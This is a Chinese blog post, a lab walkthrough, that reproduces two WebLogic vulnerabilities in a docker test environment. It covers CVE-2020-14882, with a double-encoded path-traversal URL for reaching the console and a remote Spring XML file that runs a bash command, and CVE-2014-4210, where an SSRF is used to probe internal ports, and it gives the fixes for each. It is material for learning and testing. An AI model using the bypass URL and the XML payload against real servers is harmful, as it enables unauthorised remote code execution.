Weblogic漏洞复现

最新推荐文章于 2023-09-26 17:01:11 发布
最新推荐文章于 2023-09-26 17:01:11 发布
阅读量640 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: weblogic 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44504968/article/details/115287375
版权

Weblogic 漏洞复现

一、CVE-2020-14882 Weblogic 未授权绕过RCE

1.1漏洞原理

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,最终远程执行代码接管 WebLogic 服务器。

1.2漏洞风险等级

【高危】

1.3漏洞影响范围

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

1.4实验环境

1.4.1靶机:

4.1.1、系统:ubuntu
4.1.2、Weblogic版本:Weblogic 12.2.1.3
4.1.3、IP:192.168.22.136
4.1.4、环境配置:
新建docker-compose.yml文件,添加如下命令【一定要注意格式】:

version: '2'
services:
 weblogic:
   image: vulhub/weblogic:12.2.1.3-2018
   ports:
    - "7001:7001"

在这里插入图片描述访问:http://127.0.0.1:7001/console/login/LoginForm.jsp显示如下界面,证明搭建成功
在这里插入图片描述

1.4.2攻击机:

系统:win10
IP:192.168.22.xx

1.5漏洞复现

1.5.1、访问console界面成功后,通过以下url发现可以直接绕过验证并登录后台
http://靶机ip:7001/console/css/%252e%252e%252fconsole.portal
在这里插入图片描述
‘%252E%252E%252F ’为二次 URL 编码过后的‘ …/ ’,通过这个就可以实现穿越路径未授权访问相关管理后台。
在这里插入图片描述1.5.2、与正常登录页面对比发现缺少部署等功能,由于权限不足无法安装应用,所以也无法通过后台部署war包等方式直接获取权限。下图为正常登录页面
在这里插入图片描述1.5.3、可以利用com.tangosol.coherence.mvel2.sh.ShellSession类或com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext类。因为第二种是更通杀的一种方法,对weblogic所有版本均有效,所以接下来会用第二种类进行漏洞利用。
首先,我们构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml。
rce.xml代码如下:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/test_weblogic]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

在这里插入图片描述1.5.4、利用burpsuite抓包,然后执行一个get请求,使weblogic服务器可以访问到恶意xml
在这里插入图片描述1.5.5、验证恶意XML是否执行
在这里插入图片描述

1.6漏洞修复方案

1.6.1、临时处置建议
建议临时关闭后台/console/console.portal的对外访问。
1.6.2、处置建议
Oracle 官方已发布了最新针对该漏洞的补丁,受影响用户可及时下载补丁程序并安装更新。

二、CVE-2014-4210 Weblogic SSRF

2.1漏洞原理

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,根据获取的信息进而攻击内网中redis、fastcgi等脆弱组件。
Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。

2.2漏洞风险等级

【高危】

2.3漏洞影响范围

WebLogic 10.0.2.0.0
WebLogic 10.3.6.0.0

2.4实验环境

2.4.1靶机:

4.1.1、系统:ubuntu
4.1.2、Weblogic版本:Weblogic 10.3.6.0
4.1.3、IP:192.168.40.134

2.4.2攻击机:

系统:win10
IP:192.168.40.1

2.5漏洞复现

2.5.1、访问 http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexplorer应用。
在这里插入图片描述2.5.2、ssrf漏洞测试
访问漏洞所在页面:http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp
随意填写,致使发送post数据包。发现有报错,并且请求包中operator对应的是链接,可以想到访问内网地址
在这里插入图片描述将请求包中operator的值改为127.0.0.1:7002,返回报错信息:could not connect over HTTP to server
在这里插入图片描述将请求包中operator的值改为127.0.0.1:7001,返回报错信息:status code(如下图)。一般会返回状态码,如果访问的非http协议,则会返回:did not have a valid SOAP content-type
在这里插入图片描述正常我们是无法访问内网的,但是通过页面返回错误的不同,我们可以探测内网端口的开放状态,进而知道内网开启的服务,同时加以利用

2.5.3、访问漏
通过ssrf探测发现,内网中的redis服务器存活
在这里插入图片描述

2.6漏洞修复方案

2.6.1、处置建议
将SearchPublicRegistries.jsp直接删除,也可以采用改后辍的方式,修复步骤如下:
$将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份
$将weblogic安装目录下的server/lib/uddiexplorer.war下载
$用winrar等工具打开uddiexplorer.war,将其下的SearchPublicRegistries.jsp重命名为SearchPublicRegistries.jspx
$保存后上传回服务端替换原先的uddiexplorer.war
$对于多台主机组成的集群,针对每台主机都要做这样的操作
$由于每个server的tmp目录下都有缓存所以修改后要彻底重启weblogic(即停应用–停server–停控制台–启控制台–启server–启应用)

参考链接:https://www.cnblogs.com/bmjoker/p/9759761.html

注: docker对应的IP查询:
先查看容器id然后查看该docker对应的IP
docker inspect 53bf9ecbe6b5 | grep IPAddres
在这里插入图片描述

俗半
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
weblogic漏洞复现
weixin_52374319的博客
06-21 553
4、查看ldap服务器,成功反弹shell。3、执行exp获取反弹shell。
Weblogic 漏洞复现
Knsec
06-03 2554
Weblogic 漏洞复现
weblogic 漏洞复现
03-11 7173
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录 sudo service docker start //启动docker服务 docker-compose up -d //启动 docker-compose stop //测试完毕后停止服务 docker-compose down //移除容器 Weblogic 任意文件上传漏洞CVE-2018-2894) 漏洞成因:WebLogic 管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
热门推荐
good good study
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogi...
weblogic cmd命令漏洞检测
04-08
weblogic中cmd反序列号漏洞检测,必须要求是java8的环境启动,也可以选择对jboos的漏洞,对安全测评来说,比较重要,可以复现漏洞
网络安全weblogic漏洞复现
最新发布
zxcvbnmasdflzl的博客
09-26 582
用户管理员在配置密码时将登陆口令设置为简易的弱口令,这使得攻击者可以很容易的猜解到口令并登陆进后台,通过部署木马文件,拿到shell,进行进一步的渗透。
【网络安全---漏洞复现WebLogic 反序列化漏洞(CVE-2019-2890)漏洞复现
m0_67844671的博客
09-19 1148
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
[Vulhub] Weblogic 漏洞复现
weixin_45605352的博客
09-11 2615
Weblogic 反序列化远程代码执行漏洞CVE-2019-2725) 0x00 漏洞描述 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 0x01 影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 0x03 漏洞分析 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/
Weblogic (weak_password)漏洞复现
huangyongkang666的博客
07-22 1709
Weblogic (weak_password)漏洞复现
weblogic 漏洞复现(1)
初学者L_言的博客
12-04 721
一、环境搭建 # 这里采用 vulhub/weblogic漏洞镜像搭建 docker pull vulhub/weblogic:12.2.1.3-2018 # 端口映射 docker run -di -p 7001:7001 -p 8055:8055 vulhub/weblogic:12.2.1.3-2018 二、漏洞信息收集 工具地址 # 发现版本信息 WebLogic Server 版本: 12.2.1.3.0 # 漏洞信息 CVE-2018-2894 #影响版本 weblogic
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628)复现
s1056481432的博客
08-02 808
漏洞介绍 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 漏洞环境 我这里是直接用vulhub搭建环境的官网:https://vulhub.org/,使用方法很简单直接git clone https://github.com/vulhub/vulhub.git 就可以了,之后到下载的文件夹找到我们要复现漏洞的文件夹
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3463
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic漏洞复现vulhub
08-21
复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动weblogic服务。 你可以通过访问https://github.com/zhzyker/exphub/tree/master/weblogic获取更多关于weblogic漏洞的信息。 在vulhub的靶场上,你可以学习和复现一些weblogic漏洞。虽然还有很多其他漏洞没有被复现,但通过复现一些典型漏洞,你可以熟悉这些漏洞的原理。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhub】WeblogicCVE-2018-2894)漏洞复现](https://blog.csdn.net/qq_45300786/article/details/115579631)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Weblogic系列漏洞复现——vulhub](https://blog.csdn.net/qq_45612828/article/details/126235627)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值